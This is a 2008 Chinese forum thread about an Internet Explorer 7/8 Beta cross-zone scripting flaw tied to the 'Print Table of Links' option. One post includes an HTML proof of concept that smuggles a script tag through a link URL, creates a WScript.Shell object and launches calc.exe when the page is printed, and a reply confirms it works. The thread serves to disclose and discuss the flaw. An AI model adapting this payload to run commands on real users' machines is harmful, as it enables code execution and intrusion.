文本版|topic 高级搜索
   名人堂 帮助 论坛制度 意见反馈 | 首页 博客 周新贴 招聘 专题 新闻
RSS 底部
 
社区导航: 专家门诊   网络技术   操作系统   数据库   程序设计   系统应用   考试认证   CIO及信息化   站长交流   综合交流   下载基地  51CTO产品服务 设为首页 | 收藏本站
51CTO技术论坛» 网络安全 » Internet Explorer 7/8b 0day攻击代码出现       [ 打印]  [ 订阅]  [ 收藏]  [ 推荐给朋友]   [ 本帖文本页]

论坛跳转:
     
标题: [讨论] Internet Explorer 7/8b 0day攻击代码出现  ( 查看:152  回复:3 )   
 
SimpleLove
副版主  点击可查看详细


帖子 1918
精华 7
无忧币 7043
积分 5710
阅读权限 140
注册日期 2006-1-11
最后登录 2008-7-4 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-5-17 13:08   标题:Internet Explorer 7/8b 0day攻击代码出现
上一帖 |
安全研究人员Nate McFeters公布了一个IE7/8 Beta的0day漏洞,这一漏洞对XP有效,属于跨区域脚本漏洞,主要发生于本地区域和Internet区域的网页读取时.
目前这一漏洞没有被修补,并可以影响许多程序,包括Azureus,uTorrent,Eclipse平台等.

查看:Aviv Raff drops an 0-day for IE 7.0 and 8.0b on XP



好好学习,天天向上
2008-5-17 13:081楼
[ 顶部 ]
 
SimpleLove
副版主  点击可查看详细


帖子 1918
精华 7
无忧币 7043
积分 5710
阅读权限 140
注册日期 2006-1-11
最后登录 2008-7-4 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-5-17 13:14 
MS Internet Explorer "rint Table of Links" Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 "rint Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它

重现:
1.下面这个地方打上勾



2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)

<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>




好好学习,天天向上
2008-5-17 13:142楼
[ 顶部 ]
 
hackersea
新新人类  点击可查看详细



十二生肖之蛇   双子座   行业勋章   技术勋章   诚信兄弟  
帖子 4
精华 0
无忧币 13
积分 5
阅读权限 20
来自 (保密)
注册日期 2008-1-5
最后登录 2008-6-6 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-5-17 21:09 
测试过了,是真的..



网络工程师到底该不该去考CCIE认证?
2008-5-17 21:093楼
[ 顶部 ]
 
bing_1980
技术员  点击可查看详细



帖子 312
精华 0
无忧币 284
积分 351
阅读权限 30
来自 (保密)
注册日期 2006-10-9
最后登录 2008-6-28 离线

[查看资料]  [发短消息]  [Blog
  QQ       
发表于:2008-5-19 11:51 
全英文的  不想看太难理解了



网络工程师到底该不该去考CCIE认证?
2008-5-19 11:514楼
[ 顶部 ]
     
论坛跳转:  

| | |

| | |

| | |

标记已读 · 删除论坛Cookies · 文本版 · WAP
 
| 诚征版主 | 版主堂 | 意见建议 | 大史记 | 论坛地图
Copyright©2005-2008 51CTO.COM  Powered by Discuz!
本论坛言论纯属发布者个人意见,不代表51CTO网站立场!如有疑义,请与管理员联系。
京ICP备05051492号